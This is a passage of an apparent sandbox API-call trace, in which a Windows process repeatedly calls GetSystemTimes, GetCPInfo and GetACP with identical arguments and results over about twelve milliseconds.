lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.493] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.493] GetACP () returned 0x4e4 [0120.493] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.493] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.493] GetACP () returned 0x4e4 [0120.493] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.493] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.494] GetACP () returned 0x4e4 [0120.494] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.494] GetACP () returned 0x4e4 [0120.494] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.494] GetACP () returned 0x4e4 [0120.494] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.494] GetACP () returned 0x4e4 [0120.494] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.494] GetACP () returned 0x4e4 [0120.494] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.494] GetACP () returned 0x4e4 [0120.494] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.494] GetACP () returned 0x4e4 [0120.494] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.495] GetACP () returned 0x4e4 [0120.495] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.495] GetACP () returned 0x4e4 [0120.495] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.495] GetACP () returned 0x4e4 [0120.495] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.495] GetACP () returned 0x4e4 [0120.495] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.495] GetACP () returned 0x4e4 [0120.495] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.495] GetACP () returned 0x4e4 [0120.495] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.496] GetACP () returned 0x4e4 [0120.496] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.496] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.496] GetACP () returned 0x4e4 [0120.496] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.496] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.496] GetACP () returned 0x4e4 [0120.496] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.496] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.496] GetACP () returned 0x4e4 [0120.496] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.496] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.496] GetACP () returned 0x4e4 [0120.496] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.496] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.496] GetACP () returned 0x4e4 [0120.496] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.496] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.496] GetACP () returned 0x4e4 [0120.496] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.497] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.497] GetACP () returned 0x4e4 [0120.497] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.497] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.497] GetACP () returned 0x4e4 [0120.497] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.497] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.497] GetACP () returned 0x4e4 [0120.497] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.497] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.497] GetACP () returned 0x4e4 [0120.497] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.497] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.497] GetACP () returned 0x4e4 [0120.497] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.497] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.497] GetACP () returned 0x4e4 [0120.497] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.498] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.498] GetACP () returned 0x4e4 [0120.498] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.498] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.498] GetACP () returned 0x4e4 [0120.498] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.498] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.498] GetACP () returned 0x4e4 [0120.498] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.498] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.498] GetACP () returned 0x4e4 [0120.498] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.498] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.498] GetACP () returned 0x4e4 [0120.498] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.499] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.499] GetACP () returned 0x4e4 [0120.499] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.499] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.499] GetACP () returned 0x4e4 [0120.499] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.499] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.499] GetACP () returned 0x4e4 [0120.499] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.499] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.499] GetACP () returned 0x4e4 [0120.499] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.499] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.499] GetACP () returned 0x4e4 [0120.499] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.499] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.499] GetACP () returned 0x4e4 [0120.499] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.499] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.499] GetACP () returned 0x4e4 [0120.499] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.500] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.500] GetACP () returned 0x4e4 [0120.500] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.500] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.500] GetACP () returned 0x4e4 [0120.500] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.500] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.500] GetACP () returned 0x4e4 [0120.500] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.500] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.500] GetACP () returned 0x4e4 [0120.500] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.500] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.501] GetACP () returned 0x4e4 [0120.501] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.501] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.501] GetACP () returned 0x4e4 [0120.501] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.501] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.501] GetACP () returned 0x4e4 [0120.501] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.501] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.501] GetACP () returned 0x4e4 [0120.501] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.501] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.501] GetACP () returned 0x4e4 [0120.501] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.501] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.501] GetACP () returned 0x4e4 [0120.501] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.501] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.501] GetACP () returned 0x4e4 [0120.501] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.502] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.502] GetACP () returned 0x4e4 [0120.502] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.502] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.502] GetACP () returned 0x4e4 [0120.502] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.502] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.502] GetACP () returned 0x4e4 [0120.502] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.502] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.502] GetACP () returned 0x4e4 [0120.502] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.502] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.502] GetACP () returned 0x4e4 [0120.502] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.502] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.502] GetACP () returned 0x4e4 [0120.502] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.502] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.502] GetACP () returned 0x4e4 [0120.503] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.503] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.503] GetACP () returned 0x4e4 [0120.503] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.503] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.503] GetACP () returned 0x4e4 [0120.503] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.503] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.503] GetACP () returned 0x4e4 [0120.503] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.503] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.503] GetACP () returned 0x4e4 [0120.503] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.503] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.503] GetACP () returned 0x4e4 [0120.503] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.503] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.503] GetACP () returned 0x4e4 [0120.503] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.504] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.504] GetACP () returned 0x4e4 [0120.504] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.504] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.504] GetACP () returned 0x4e4 [0120.504] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.504] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.504] GetACP () returned 0x4e4 [0120.504] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.504] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.504] GetACP () returned 0x4e4 [0120.504] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.504] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.504] GetACP () returned 0x4e4 [0120.504] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.504] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.504] GetACP () returned 0x4e4 [0120.504] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.504] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.504] GetACP () returned 0x4e4 [0120.505] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.505] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.505] GetACP () returned 0x4e4 [0120.505] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.505] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.505] GetACP () returned 0x4e4 [0120.505] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.505] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.505] GetACP () returned 0x4e4 [0120.505] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.505] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.505] GetACP () returned 0x4e4 [0120.505] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.505] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0120.505] GetACP () returned 0x4e4 [0120.505] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0120.505] GetCPInfo (in: 